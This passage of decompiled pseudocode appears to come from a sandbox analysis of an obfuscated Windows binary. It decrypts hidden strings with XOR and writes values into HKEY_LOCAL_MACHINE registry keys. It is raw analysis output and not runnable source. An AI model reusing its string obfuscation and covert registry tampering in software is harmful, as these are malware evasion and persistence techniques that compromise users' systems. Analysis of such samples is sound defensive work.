				void* _t1426;
				intOrPtr* _t1427;
				signed int _t1452;
				signed int _t1470;
				char* _t1480;
				signed int _t1481;
				signed int _t1515;
				signed int _t1520;
				signed int _t1525;
				char _t1531;
				signed int _t1576;
				char _t1599;
				char _t1606;
				char _t1614;
				signed int _t1628;
				intOrPtr* _t1638;
				char* _t1639;
				char* _t1647;
				char* _t1648;
				char* _t1649;
				signed int _t1655;
				char* _t1661;
				char _t1662;
				signed int _t1671;
				signed int _t1679;
				intOrPtr* _t1680;
				char _t1681;
				signed int _t1692;
				char* _t1693;
				signed int _t1701;
				signed int _t1707;
				int _t1710;
				void* _t1714;
				char* _t1715;
				int _t1716;
				char* _t1720;
				int _t1721;
				int _t1724;
				int _t1729;
				signed int _t1738;
				int _t1741;
				int _t1742;
				signed int _t1747;
				char _t1748;
				char _t1749;
				void* _t1750;
				char* _t1751;
				char* _t1758;
				intOrPtr* _t1769;
				intOrPtr* _t1770;
				intOrPtr* _t1771;
				intOrPtr* _t1772;
				intOrPtr* _t1773;
				intOrPtr* _t1774;
				intOrPtr* _t1775;
				intOrPtr* _t1776;
				signed int _t1777;
				void* _t1778;
				intOrPtr* _t1779;
				intOrPtr* _t1787;
				intOrPtr* _t1788;
				intOrPtr* _t1789;
				char* _t1790;
				void* _t1791;
				char* _t1796;
				char _t1803;
				void* _t1804;
				intOrPtr* _t1805;
				char _t1806;
				void* _t1807;
				char _t1808;
				void* _t1809;
				intOrPtr* _t1810;
				char _t1811;
				void* _t1812;
				intOrPtr* _t1813;
				char _t1814;
				void* _t1815;
				void* _t1820;
				void* _t1825;
				intOrPtr* _t1827;
				void* _t1828;
				void* _t1829;
				void* _t1833;
				void* _t1834;
				void* _t1836;
				void* _t1849;
				void* _t1854;
				void* _t1864;
				void* _t1899;
				void* _t1904;

				_t1437 = _t1820;
				_v8 =  *((intOrPtr*)(_t1820 + 4));
				_v120 = __ecx;
				_v40 =  *0xee2c60;
				_v24 = E00EB6930(0x6db6a8d3, 0x22);
				_t1046 = E00EB6930(0x6c38a518, 0x22);
				_v812 = 0xa5a4c770;
				_t1728 = _t1046;
				_v808 = 0x43d53aa5;
				_t1825 = (_t1820 - 0x00000008 & 0xfffffff0) + 4 - 0x3a8 + 0x10;
				_v804 = 0xd07612d4;
				_v800 = 0x826d2b5e;
				_v796 = 0x274978fe;
				_v792 = 0xa689f4db;
				_v788 = 0x81970b95;
				_v784 = 0x57eeedea;
				_v780 = 0x39ed4c88;
				_v776 = 0x26a83292;
				_v772 = 0xda3fe1c2;
				_v768 = 0x1dc8f16b;
				asm("movaps xmm1, [ebp-0x320]");
				_v252 = 0xf1e28823;
				_v248 = 0x6877bf2;
				_v244 = 0xbc194288;
				_v240 = 0xe7044837;
				asm("pxor xmm1, [ebp-0xf0]");
				asm("movaps [ebp-0x320], xmm1");
				asm("movaps xmm1, [ebp-0x310]");
				_v236 = 0x4e04248d;
				_v232 = 0xd5e686b8;
				_v228 = 0xdde36dfa;
				_v224 = 0x338084bd;
				asm("pxor xmm1, [ebp-0xe0]");
				asm("movaps [ebp-0x310], xmm1");
				asm("movaps xmm1, [ebp-0x300]");
				_v76 = 0x97ad;
				_v72 = 0;
				_v220 = 0x199e3be7;
				_v216 = 0x43ce57d6;
				_v212 = 0xa85a85ac;
				_v208 = 0x1dc8f16b;
				asm("pxor xmm1, [ebp-0xd0]");
				asm("movaps [ebp-0x300], xmm1");
				_v20 = _v76 ^ 0x00000009;
				_v16 = _v72 ^ 0x00000000;
				_v76 = 9;
				_v72 = 0;
				_v68 = 0xd8c4;
				_v64 = 0;
				_v36 = 0x97a4;
				_v32 = 0;
				asm("adc esi, ecx");
				_v68 = _v76 + _v68 + 1;
				asm("adc esi, 0x0");
				_v64 = _v72;
				_v20 = _v20 - _v36;
				asm("sbb esi, ecx");
				_t1635 = _v16;
				_v20 = E00E80C40(_v20, _t1635, _v68, _v64);
				_v16 = _t1635;
				_t1055 = RegOpenKeyExA(0x80000002,  &_v812, _t1046, _v24,  &_v328);
				_t1747 = _v16;
				asm("cdq");
				if(_t1055 != _v20 || _t1635 != _t1747) {
					L66:
					_v112 = 0;
					_t1748 = E00E28D30(_t1437, _t1635, _t1728, 0x18);
					_v80 = _t1748;
					E00E29300(_t1748,  &_v80);
					_t393 = _t1748 + 4; // 0x4
					E00E29300(_t393,  &_v80);
					_t394 = _t1748 + 8; // 0x8
					E00E29300(_t394,  &_v80);
					 *((short*)(_t1748 + 0xc)) = 0x101;
					_v116 = _t1748;
					_v128 = 0;
					_t1749 = E00E28D30(_t1437,  &_v80, _t1728, 0x18);
					_t1827 = _t1825 + 8;
					_v40 = _t1749;
					_v340 = _t1749;
					E00E29300(_t1749,  &_v340);
					_t401 = _t1749 + 4; // 0x4
					E00E29300(_t401,  &_v340);
					_t402 = _t1749 + 8; // 0x8
					_t1450 = _t402;
					E00E29300(_t402,  &_v340);
					 *((short*)(_t1749 + 0xc)) = 0x101;
					_t1729 = 0;
					_v132 = _t1749;
					_t1750 = _v116;
					_t1638 = _t1750;
					_v320 = 0x11;
					_t1064 =  *((intOrPtr*)(_t1750 + 4));
					_v24 = _t1064;
					if( *((char*)(_t1064 + 0xd)) != 0) {
						L72:
						if( *((char*)(_t1638 + 0xd)) != 0 ||  *((intOrPtr*)(_t1638 + 0x10)) > 0x11) {
							__eflags = _v112 - 0xaaaaaaa;
							if(__eflags == 0) {
								goto L148;
							}
							_v336 = _t1750;
							_v916 =  &_v320;
							_v188 =  &_v116;
							_t1245 = E00E28D30(_t1437, _t1638, _t1729, 0x18);
							_t1662 =  *0xed185b; // 0x0
							_t1777 = _t1245;
							_v84 = _t1662;
							_v184 = _t1777;
							_t426 = _t1777 + 0x10; // 0x10
							 *_t1827 =  &_v320;
							E00E37640(_t426, _v84, _t426);
							E00E29300(_t1777,  &_v336);
							_t429 = _t1777 + 4; // 0x4
							E00E29300(_t429,  &_v336);
							_t430 = _t1777 + 8; // 0x8
							E00E29300(_t430,  &_v336);
							 *((short*)(_t1777 + 0xc)) = 0;
							_v500 = 0;
							_t1251 = E00E29740( &_v184,  &_v500);
							_t1531 = _v184;
							_t1778 = _t1251;
							__eflags = _t1531;
							if(_t1531 != 0) {
								_push(0x18);
								E00E28D60(_t1437, _t1729, _t1531);
								_t1827 = _t1827 + 8;
							}
							_t1252 = E00E294B0( &_v116, _v24, _t1729, _t1778);
							_t1450 = _v132;
							_t1638 = _t1252;
							_t1779 = _v116;
							_v40 = _t1450;
							goto L79;
						} else {
							_t1450 = _v40;
							L79:
							if( *((intOrPtr*)(_t1638 + 0x14)) != 5) {
								L95:
								_v404 = _v112;
								 *((intOrPtr*)(E00E2C270(_t1437,  &_v116,  &_v404))) = 5;
								_v408 = _v128;
								 *((intOrPtr*)(E00E2C270(_t1437,  &_v132,  &_v408))) = 0xd;
								__eflags = _v112;
								if(_v112 != 0) {
									L97:
									E00E2FFC0( &_v132, _t1638,  &_v132,  *((intOrPtr*)(_v132 + 4)));
									_push(0x18);
									E00E28D60(_t1437, _t1729, _v132);
									E00E2FFC0( &_v116, _t1638,  &_v116,  *((intOrPtr*)(_v116 + 4)));
									_push(0x18);
									E00E28D60(_t1437, _t1729, _v116);
									_t1849 = _t1827 + 0x10;
									E00E2C370(_t1437,  &_v172, _t1638);
									E00E2C370(_t1437,  &_v300, _t1638);
									_v84 = 0x11;
									if( *((intOrPtr*)(E00E2C270(_t1437,  &_v172,  &_v84))) != 5) {
										L100:
										_v416 = _v168;
										 *((intOrPtr*)(E00E2C270(_t1437,  &_v172,  &_v416))) = 5;
										_v440 = _v296;
										 *((intOrPtr*)(E00E2C270(_t1437,  &_v300,  &_v440))) = 0xd;
										__eflags = _v168;
										if(_v168 != 0) {
											L102:
											E00E2FFC0( &_v300, _t1638,  &_v300,  *((intOrPtr*)(_v300 + 4)));
											_push(0x18);
											E00E28D60(_t1437, _t1729, _v300);
											E00E2FFC0( &_v172, _t1638,  &_v172,  *((intOrPtr*)(_v172 + 4)));
											_push(0x18);
											E00E28D60(_t1437, _t1729, _v172);
											_v40 =  *0xee2c74;
											_v20 = 0xb1a1ac71;
											_v16 = 1;
											_v76 = _v20 ^ 0x00000009;
											_v72 = _v16 ^ 0x00000000;
											_v20 = 9;
											_v16 = 0;
											_v36 = 0xd8c4;
											_v32 = 0;
											_v68 = 0x97a4;
											_v64 = 0;
											asm("adc esi, ecx");
											_v36 = _v20 + _v36 + 1;
											asm("adc esi, 0x0");
											_v32 = _v16;
											_v20 = _v76 - _v68;
											asm("sbb esi, ecx");
											_v16 = _v72;
											_t1671 = _v16;
											_v20 = E00E80C40(_v20, _t1671, _v36, _v32);
											_v16 = _t1671;
											_v24 = _v20;
											_t1294 = E00EB6890(0xa52546c, 0);
											_v20 = 0x97ad;
											_v16 = 0;
											_v76 = _v20 ^ 0x00000009;
											_v72 = _v16 ^ 0x00000000;
											_v36 = 9;
											_v32 = 0;
											_v20 = 0xd8c4;
											_v16 = 0;
											_v68 = 0x97a4;
											_v64 = 0;
											asm("adc esi, ecx");
											_v36 = _v20 + _v36 + 1;
											asm("adc esi, 0x0");
											_v32 = _v16;
											_v20 = _v76 - _v68;
											asm("sbb esi, ecx");
											_v16 = _v72;
											_t1679 = _v16;
											_v20 = E00E80C40(_v20, _t1679, _v36, _v32);
											_v16 = _t1679;
											_v892 = 0xa5a4c770;
											_v888 = 0x43d53aa5;
											_v884 = 0xd07612d4;
											_v880 = 0x826d2b5e;
											_v876 = 0x274978fe;
											_v872 = 0xa689f4db;
											_v868 = 0x81970b95;
											_v864 = 0x57eeedea;
											_v860 = 0x39ed4c88;
											_v856 = 0x26a83292;
											_v852 = 0xda3fe1c2;
											_v848 = 0x7cada337;
											_v844 = 0x564c6a1d;
											_v840 = 0x76cb6e21;
											_v836 = 0xf5d9d4fc;
											_v832 = 0xd16f2292;
											_v828 = 0x11ada465;
											_v824 = 0x6dd0252a;
											_v820 = 0xcc6c2a70;
											_v816 = 0xd01a6f0f;
											asm("movaps xmm1, [ebp-0x370]");
											_v284 = 0xf1e28823;
											_v280 = 0x6877bf2;
											_v276 = 0xbc194288;
											_v272 = 0xe7044837;
											asm("pxor xmm1, [ebp-0x110]");
											asm("movaps [ebp-0x370], xmm1");
											asm("movaps xmm1, [ebp-0x360]");
											_v268 = 0x4e04248d;
											_v264 = 0xd5e686b8;
											_v260 = 0xdde36dfa;
											_v256 = 0x338084bd;
											_v252 = 0x199e3be7;
											_v248 = 0x43ce57d6;
											_v244 = 0xa85a85ac;
											_v240 = 0x1dc8f16b;
											_v236 = 0x3f184771;
											_v232 = 0x26eb0b4c;
											_v228 = 0x90adbb8e;
											_v224 = 0xbe0656f1;
											_v220 = 0x11ada40b;
											_v216 = 0x6dd0252a;
											_v212 = 0xcc6c2a70;
											_v208 = 0xd01a6f0f;
											asm("pxor xmm1, [ebp-0x100]");
											asm("movaps [ebp-0x360], xmm1");
											asm("movaps xmm1, [ebp-0x350]");
											asm("pxor xmm1, [ebp-0xf0]");
											asm("movaps [ebp-0x350], xmm1");
											asm("movaps xmm1, [ebp-0x340]");
											asm("pxor xmm1, [ebp-0xe0]");
											asm("movaps [ebp-0x340], xmm1");
											asm("movaps xmm1, [ebp-0x330]");
											asm("pxor xmm1, [ebp-0xd0]");
											asm("movaps [ebp-0x330], xmm1"); // executed
											_t1302 = RegCreateKeyExA(0x80000002,  &_v892, _v20, 0, _t1294, _v24, 0,  &_v124, 0);
											asm("cdq");
											_t1738 = _t1679;
											_t1204 = E00EB6930(0x6c38a459, 0x22);
											_t1827 = _t1849 + 0x20;
											if(_t1302 != _t1204 || _t1738 != _t1679) {
												goto L141;
											} else {
												_t1066 =  *0xee2f54; // 0x80000001
												if(_t1066 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
													goto L150;
												}
												goto L105;
											}
										}
										L101:
										_t1787 = _v300;
										E00E2FFC0( &_v300, _t1638,  &_v300,  *((intOrPtr*)(_t1787 + 4)));
										 *((intOrPtr*)(_t1787 + 4)) = _t1787;
										 *_t1787 = _t1787;
										 *((intOrPtr*)(_t1787 + 8)) = _t1787;
										_v296 = 0;
										goto L102;
									}
									_v412 = 0xbe;
									if( *((intOrPtr*)(E00E2C270(_t1437,  &_v300,  &_v412))) != 0xd) {
										goto L100;
									}
									_t1788 = _v172;
									E00E2FFC0( &_v172, _t1638,  &_v172,  *((intOrPtr*)(_t1788 + 4)));
									 *((intOrPtr*)(_t1788 + 4)) = _t1788;
									 *_t1788 = _t1788;
									 *((intOrPtr*)(_t1788 + 8)) = _t1788;
									_v168 = 0;
									goto L101;
								}
								L96:
								_t1789 = _v132;
								E00E2FFC0( &_v132, _t1638,  &_v132,  *((intOrPtr*)(_t1789 + 4)));
								 *((intOrPtr*)(_t1789 + 4)) = _t1789;
								 *_t1789 = _t1789;
								 *((intOrPtr*)(_t1789 + 8)) = _t1789;
								_v128 = 0;
								goto L97;
							}
							_v392 = 0xbe;
							_t1729 = 0;
							_t1312 =  *((intOrPtr*)(_t1450 + 4));
							_t1680 = _t1450;
							_v24 = _t1312;
							if( *((char*)(_t1312 + 0xd)) != 0) {
								L87:
								if( *((char*)(_t1680 + 0xd)) != 0 ||  *((intOrPtr*)(_t1680 + 0x10)) > 0xbe) {
									if(_v128 == 0xaaaaaaa) {
										goto L149;
									}
									_v332 = _t1450;
									_v920 =  &_v392;
									_v196 =  &_v132;
									_t1315 = E00E28D30(_t1437, _t1680, _t1729, 0x18);
									_t1681 =  *0xed185b; // 0x0
									_t1790 = _t1315;
									_v84 = _t1681;
									_v192 = _t1790;
									_t462 = _t1790 + 0x10; // 0x10
									 *_t1827 =  &_v392;
									E00E37640(_t462, _v84, _t462);
									E00E29300(_t1790,  &_v332);
									_t465 = _t1790 + 4; // 0x4
									E00E29300(_t465,  &_v332);
									_t466 = _t1790 + 8; // 0x8
									E00E29300(_t466,  &_v332);
									 *((short*)(_t1790 + 0xc)) = 0;
									_v504 = 0;
									_t1321 = E00E29740( &_v192,  &_v504);
									_t1565 = _v192;
									_t1791 = _t1321;
									if(_v192 != 0) {
										_push(0x18);
										E00E28D60(_t1437, _t1729, _t1565);
										_t1827 = _t1827 + 8;
									}
									_t1322 = E00E294B0( &_v132, _v24, _t1729, _t1791);
									_t1779 = _v116;
									_t1638 = _t1322;
									goto L93;
								} else {
									L93:
									if( *((intOrPtr*)(_t1638 + 0x14)) != 0xd) {
										goto L95;
									}
									E00E2FFC0( &_v116, _t1638,  &_v116,  *((intOrPtr*)(_t1779 + 4)));
									 *((intOrPtr*)(_t1779 + 4)) = _t1779;
									 *_t1779 = _t1779;
									 *((intOrPtr*)(_t1779 + 8)) = _t1779;
									_v112 = 0;
									goto L96;
								}
							}
							do {
								_v24 = _t1312;
								if( *((intOrPtr*)(_t1312 + 0x10)) >= 0xbe) {
									_t1680 = _t1312;
									_t1729 = 1;
									_t1312 =  *_t1312;
								} else {
									_t1312 =  *((intOrPtr*)(_t1312 + 8));
									_t1729 = 0;
								}
							} while ( *((char*)(_t1312 + 0xd)) == 0);
							_t1450 = _v40;
							goto L87;
						}
					}
					do {
						_v24 = _t1064;
						if( *((intOrPtr*)(_t1064 + 0x10)) >= 0x11) {
							_t1638 = _t1064;
							_t1729 = 1;
							_t1064 =  *_t1064;
						} else {
							_t1064 =  *((intOrPtr*)(_t1064 + 8));
							_t1729 = 0;
						}
					} while ( *((char*)(_t1064 + 0xd)) == 0);
					goto L72;
				} else {
					_v24 =  *0xee2c78;
					_t1328 = E00EB6930(0x6c38a755, 0x22);
					_v20 = 0x3fad5;
					_v16 = 0;
					_v76 = _v20 ^ 0x00000009;
					_v72 = _v16 ^ 0x00000000;
					_v36 = 9;
					_v32 = 0;
					_v20 = 0xd8c4;
					_v16 = 0;
					_v68 = 0x97a4;
					_v64 = 0;
					asm("adc esi, ecx");
					_v36 = _v20 + _v36 + 1;
					asm("adc esi, 0x0");
					_v32 = _v16;
					_v20 = _v76 - _v68;
					asm("sbb esi, ecx");
					_v16 = _v72;
					_t1692 = _v16;
					_v20 = E00E80C40(_v20, _t1692, _v36, _v32);
					_v16 = _t1692;
					_t1334 = E00EB6890(0xa4fca06, 0);
					_v540 = 0x9091e167;
					_v536 = 0x47e21790;
					_t1854 = _t1825 + 0x10;
					_v532 = 0xef7036e6;
					_v528 = 0x86733147;
					_v524 = 0x4e0441ff;
					_v520 = 0xd5e686b8;
					_v516 = 0xdde36dfa;
					_v512 = 0x338084bd;
					asm("movaps xmm1, [ebp-0x210]");
					_v236 = 0xf1e28823;
					_v232 = 0x6877bf2;
					_v228 = 0xbc194288;
					_v224 = 0xe7044837;
					asm("pxor xmm1, [ebp-0xe0]");
					asm("movaps [ebp-0x210], xmm1");
					asm("movaps xmm1, [ebp-0x200]");
					_v220 = 0x4e04248d;
					_v216 = 0xd5e686b8;
					_v212 = 0xdde36dfa;
					_v208 = 0x338084bd;
					asm("pxor xmm1, [ebp-0xd0]");
					asm("movaps [ebp-0x200], xmm1");
					RegSetValueExA(_v328,  &_v540, _t1334, _v20,  &_v120, _t1328);
					_t1338 =  *0xee2f54; // 0x80000001
					if(_t1338 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
						E00E38E56(_t1338, 0xee2f54);
						_t1854 = _t1854 + 4;
						__eflags =  *0xee2f54 - 0xffffffff;
						if(__eflags == 0) {
							 *0xee2f48 = 0;
							 *0xee2f4c = 0;
							 *0xee2f50 = 0;
							E00E38CD4(__eflags, E00EBA040);
							E00E38E0C(0xee2f54);
							_t1854 = _t1854 + 8;
						}
					}
					_t1693 =  *0xee2f4c; // 0x0
					_t1796 =  *0xee2f48; // 0x0
					_t1576 = _t1693 - _t1796;
					if(_t1576 >> 3 >= 0xf) {
						 *0xee2f4c = _t1796;
					} else {
						_v353 = 1;
						_t1628 = (_t1576 ^ 0x000007e8) >> 3;
						_v932 = _t1628;
						_v452 = 1;
						_v448 = _t1628;
						_t1864 = _t1693 -  *0xee2f50; // 0x0
						if(_t1864 == 0) {
							_push( &_v452);
							E00E30010(_t1693);
						} else {
							 *_t1693 = 1;
							_t1693[4] = _v448;
							 *0xee2f4c =  &(( *0xee2f4c)[8]);
						}
					}
					_v320 =  *0xee2c78;
					_t1343 = E00EB6930(0x6c38a755, 0x22);
					_v20 = 0x3fad5;
					_v16 = 0;
					_v76 = _v20 ^ 0x00000009;
					_v72 = _v16 ^ 0x00000000;
					_v36 = 9;
					_v32 = 0;
					_v20 = 0xd8c4;
					_v16 = 0;
					_v68 = 0x97a4;
					_v64 = 0;
					_v24 = _t1343;
					asm("adc esi, ecx");
					_v36 = _v20 + _v36 + 1;
					asm("adc esi, 0x0");
					_v32 = _v16;
					_v20 = _v76 - _v68;
					asm("sbb esi, ecx");
					_v16 = _v72;
					_t1701 = _v16;
					_v20 = E00E80C40(_v20, _t1701, _v36, _v32);
					_v16 = _t1701;
					_v20 = 0x97ad;
					_v16 = 0;
					_v76 = _v20 ^ 0x00000009;
					_v72 = _v16 ^ 0x00000000;
					_v36 = 9;
					_v32 = 0;
					_v20 = 0xd8c4;
					_v16 = 0;
					_v68 = 0x97a4;
					_v64 = 0;
					asm("adc esi, ecx");
					_v36 = _v20 + _v36 + 1;
					asm("adc esi, 0x0");
					_v32 = _v16;
					_v20 = _v76 - _v68;
					asm("sbb esi, ecx");
					_v16 = _v72;
					_t1707 = _v16;
					_v20 = E00E80C40(_v20, _t1707, _v36, _v32);
					_v16 = _t1707;
					_v572 = 0x9091e167;
					_v568 = 0x54e21790;
					_v564 = 0xd56d37e7;
					_v560 = 0x9e682d59;
					_v556 = 0x276f45d9;
					_v552 = 0xb6a7e1d6;
					_v548 = 0xb38c048e;
					_v544 = 0x338084bd;
					asm("movaps xmm1, [ebp-0x230]");
					_v236 = 0xf1e28823;
					_v232 = 0x6877bf2;
					_v228 = 0xbc194288;
					_v224 = 0xe7044837;
					asm("pxor xmm1, [ebp-0xe0]");
					asm("movaps [ebp-0x230], xmm1");
					asm("movaps xmm1, [ebp-0x220]");
					_v220 = 0x4e04248d;
					_v216 = 0xd5e686b8;
					_v212 = 0xdde36dfa;
					_v208 = 0x338084bd;
					asm("pxor xmm1, [ebp-0xd0]");
					asm("movaps [ebp-0x220], xmm1"); // executed
					RegSetValueExA(_v328,  &_v572, _v20, _v20,  &_v120, _v24);
					RegCloseKey(_v328);
					_v104 = 0;
					_t1803 = E00E28D30(_t1437, _t1707, _v20, 0x18);
					_v372 = _t1803;
					E00E29300(_t1803,  &_v372);
					_t218 = _t1803 + 4; // 0x4
					E00E29300(_t218,  &_v372);
					_t219 = _t1803 + 8; // 0x8
					E00E29300(_t219,  &_v372);
					 *((short*)(_t1803 + 0xc)) = 0x101;
					_v108 = _t1803;
					_v96 = 0;
					_t1804 = E00E28D30(_t1437,  &_v372, _v20, 0x18);
					_t1709 =  &_v368;
					_t1827 = _t1854 + 0x10;
					_v24 = _t1804;
					_v368 = _t1804;
					E00E29300(_t1804,  &_v368);
					_t226 = _t1804 + 4; // 0x4
					E00E29300(_t226,  &_v368);
					_t227 = _t1804 + 8; // 0x8
					E00E29300(_t227,  &_v368);
					 *((short*)(_t1804 + 0xc)) = 0x101;
					_v100 = _t1804;
					_v380 = 0x11;
					_t1805 = _v108;
					_t1741 = 0;
					_v80 = _t1805;
					_t1450 = _t1805;
					_t1368 =  *((intOrPtr*)(_t1805 + 4));
					_v40 = _t1368;
					if( *((char*)(_t1368 + 0xd)) != 0) {
						L14:
						if( *((char*)(_t1450 + 0xd)) != 0 ||  *((intOrPtr*)(_t1450 + 0x10)) > 0x11) {
							__eflags = _v104 - 0xaaaaaaa;
							if(__eflags == 0) {
								E00E21C50(_t1450, __eflags);
								goto L145;
							}
							_v360 = _t1805;
							_v908 =  &_v380;
							_v460 =  &_v108;
							_t1375 = E00E28D30(_t1437, _t1709, _t1741, 0x18);
							_t1710 =  *0xed185b; // 0x0
							_t1806 = _t1375;
							_v24 = _t1710;
							_v456 = _t1806;
							_t252 = _t1806 + 0x10; // 0x10
							 *_t1827 =  &_v380;
							E00E37640(_t252, _v24, _t252);
							E00E29300(_t1806,  &_v360);
							_t255 = _t1806 + 4; // 0x4
							E00E29300(_t255,  &_v360);
							_t256 = _t1806 + 8; // 0x8
							E00E29300(_t256,  &_v360);
							 *((short*)(_t1806 + 0xc)) = 0;
							_v444 = 0;
							_t1381 = E00E29740( &_v456,  &_v444);
							_t1599 = _v456;
							_t1807 = _t1381;
							__eflags = _t1599;
							if(_t1599 != 0) {
								_push(0x18);
								E00E28D60(_t1437, _t1741, _t1599);
								_t1827 = _t1827 + 8;
							}
							_t1382 = E00E294B0( &_v108, _v40, _t1741, _t1807);
							_t1805 = _v108;
							_t1450 = _t1382;
							_t1714 = _v100;
							_v80 = _t1805;
							goto L21;
						} else {
							_t1714 = _v24;
							L21:
							if( *((intOrPtr*)(_t1450 + 0x14)) != 5) {
								L37:
								_t1715 = _v104;
								_t1742 = 0;
								_v400 = _t1715;
								_t1450 = _t1805;
								_t1383 =  *((intOrPtr*)(_t1805 + 4));
								_v40 = _t1383;
								__eflags =  *((char*)(_t1383 + 0xd));
								if( *((char*)(_t1383 + 0xd)) != 0) {
									L44:
									__eflags =  *((char*)(_t1450 + 0xd));
									if( *((char*)(_t1450 + 0xd)) != 0) {
										L46:
										__eflags = _t1715 - 0xaaaaaaa;
										if(__eflags == 0) {
											L146:
											E00E21C50(_t1450, __eflags);
											L147:
											E00E21C50(_t1450, __eflags);
											L148:
											E00E21C50(_t1450, __eflags);
											L149:
											_t1066 = E00E21C50(_t1450, __eflags);
											L150:
											E00E38E56(_t1066, 0xee2f54);
											_t1828 = _t1827 + 4;
											__eflags =  *0xee2f54 - 0xffffffff;
											if(__eflags == 0) {
												 *0xee2f48 = 0;
												 *0xee2f4c = 0;
												 *0xee2f50 = 0;
												E00E38CD4(__eflags, E00EBA040);
												E00E38E0C(0xee2f54);
												_t1828 = _t1828 + 8;
											}
											L105:
											_t1639 =  *0xee2f4c; // 0x0
											_t1751 =  *0xee2f48; // 0x0
											_t1452 = _t1639 - _t1751;
											if(_t1452 >> 3 >= 0xf) {
												 *0xee2f4c = _t1751;
											} else {
												_v321 = 1;
												_t1525 = (_t1452 ^ 0x000007e8) >> 3;
												_v924 = _t1525;
												_v92 = 1;
												_v88 = _t1525;
												_t1899 = _t1639 -  *0xee2f50; // 0x0
												if(_t1899 == 0) {
													_push( &_v92);
													E00E30010(_t1639);
												} else {
													 *_t1639 = 1;
													_t1639[4] = _v88;
													 *0xee2f4c =  &(( *0xee2f4c)[8]);
												}
											}
											_v24 =  *0xee2c78;
											_t1071 = E00EB6930(0x6c38a755, 0x22);
											_t1730 = _t1071;
											_t1072 = E00EB6890(0xa59f36e, 0);
											_t1073 = E00EB6890(0xa4fca06, 0);
											_t1829 = _t1828 + 0x18;
											_v604 = 0x9091e167;
											_v600 = 0x44e21790;
											_v596 = 0xca782aed;
											_v592 = 0xaa76275e;
											_v588 = 0x3a6d4ae2;
											_v584 = 0xbb8ff4d7;
											_v580 = 0xdde36d9d;
											_v576 = 0x338084bd;
											asm("movaps xmm1, [ebp-0x250]");
											_v236 = 0xf1e28823;
											_v232 = 0x6877bf2;
											_v228 = 0xbc194288;
											_v224 = 0xe7044837;
											asm("pxor xmm1, [ebp-0xe0]");
											asm("movaps [ebp-0x250], xmm1");
											asm("movaps xmm1, [ebp-0x240]");
											_v220 = 0x4e04248d;
											_v216 = 0xd5e686b8;
											_v212 = 0xdde36dfa;
											_v208 = 0x338084bd;
											asm("pxor xmm1, [ebp-0xd0]");
											asm("movaps [ebp-0x240], xmm1"); // executed
											RegSetValueExA(_v124,  &_v604, _t1073, _t1072,  &_v120, _t1071);
											E00E2C370(_t1437,  &_v164, _t1639);
											E00E2C370(_t1437,  &_v292, _t1639);
											_v348 = 0x11;
											if( *((intOrPtr*)(E00E2C270(_t1437,  &_v164,  &_v348))) != 5) {
												L113:
												_v424 = _v160;
												 *((intOrPtr*)(E00E2C270(_t1437,  &_v164,  &_v424))) = 5;
												_v428 = _v288;
												 *((intOrPtr*)(E00E2C270(_t1437,  &_v292,  &_v428))) = 0xd;
												__eflags = _v160;
												if(_v160 != 0) {
													goto L115;
												}
												goto L114;
											} else {
												_v420 = 0xbe;
												if( *((intOrPtr*)(E00E2C270(_t1437,  &_v292,  &_v420))) != 0xd) {
													goto L113;
												}
												_t1776 = _v164;
												E00E2FFC0( &_v164, _t1639,  &_v164,  *((intOrPtr*)(_t1776 + 4)));
												 *((intOrPtr*)(_t1776 + 4)) = _t1776;
												 *_t1776 = _t1776;
												 *((intOrPtr*)(_t1776 + 8)) = _t1776;
												_v160 = 0;
												L114:
												_t1775 = _v292;
												E00E2FFC0( &_v292, _t1639,  &_v292,  *((intOrPtr*)(_t1775 + 4)));
												 *((intOrPtr*)(_t1775 + 4)) = _t1775;
												 *_t1775 = _t1775;
												 *((intOrPtr*)(_t1775 + 8)) = _t1775;
												_v288 = 0;
												L115:
												E00E2FFC0( &_v292, _t1639,  &_v292,  *((intOrPtr*)(_v292 + 4)));
												_push(0x18);
												E00E28D60(_t1437, _t1730, _v292);
												E00E2FFC0( &_v164, _t1639,  &_v164,  *((intOrPtr*)(_v164 + 4)));
												_push(0x18);
												E00E28D60(_t1437, _t1730, _v164);
												_v24 =  *0xee2c78;
												_t1095 = E00EB6890(0xa59f36e, 0);
												_v20 = 0x3fad5;
												_v16 = 0;
												_v76 = _v20 ^ 0x00000009;
												_v72 = _v16 ^ 0x00000000;
												_v20 = 9;
												_v16 = 0;
												_v36 = 0xd8c4;
												_v32 = 0;
												_v68 = 0x97a4;
												_v64 = 0;
												asm("adc esi, ecx");
												_v36 = _v20 + _v36 + 1;
												asm("adc esi, 0x0");
												_v32 = _v16;
												_v20 = _v76 - _v68;
												asm("sbb esi, ecx");
												_v16 = _v72;
												_t1647 = _v16;
												_v20 = E00E80C40(_v20, _t1647, _v36, _v32);
												_v16 = _t1647;
												_t1101 = E00EB6890(0xa4fca06, 0);
												_v636 = 0x9091e167;
												_v632 = 0x49e21790;
												_v628 = 0xdf7a03e6;
												_v624 = 0xb7773b52;
												_v620 = 0x2b704bff;
												_v616 = 0xba8ff2db;
												_v612 = 0xdde36d94;
												_v608 = 0x338084bd;
												asm("movaps xmm1, [ebp-0x270]");
												_v236 = 0xf1e28823;
												_v232 = 0x6877bf2;
												_v228 = 0xbc194288;
												_v224 = 0xe7044837;
												asm("pxor xmm1, [ebp-0xe0]");
												asm("movaps [ebp-0x270], xmm1");
												asm("movaps xmm1, [ebp-0x260]");
												_v220 = 0x4e04248d;
												_v216 = 0xd5e686b8;
												_v212 = 0xdde36dfa;
												_v208 = 0x338084bd;
												asm("pxor xmm1, [ebp-0xd0]");
												asm("movaps [ebp-0x260], xmm1"); // executed
												RegSetValueExA(_v124,  &_v636, _t1101, _v20,  &_v120, _t1095);
												_t1104 =  *0xee2c78; // 0x74b60770
												_v24 = _t1104;
												_t1105 = E00EB6930(0x6c38a755, 0x22);
												_t1106 = E00EB6930(0x6c38a755, 0x22);
												_t1107 = E00EB6930(0x6c38a459, 0x22);
												_t1833 = _t1829 + 0x38;
												_v668 = 0x9091e167;
												_v664 = 0x55e21790;
												_v660 = 0xf37723eb;
												_v656 = 0x86611a59;
												_v652 = 0x236d50e1;
												_v648 = 0xb488c3dd;
												_v644 = 0xdd860198;
												_v640 = 0x338084bd;
												asm("movaps xmm1, [ebp-0x290]");
												_v236 = 0xf1e28823;
												_v232 = 0x6877bf2;
												_v228 = 0xbc194288;
												_v224 = 0xe7044837;
												asm("pxor xmm1, [ebp-0xe0]");
												asm("movaps [ebp-0x290], xmm1");
												asm("movaps xmm1, [ebp-0x280]");
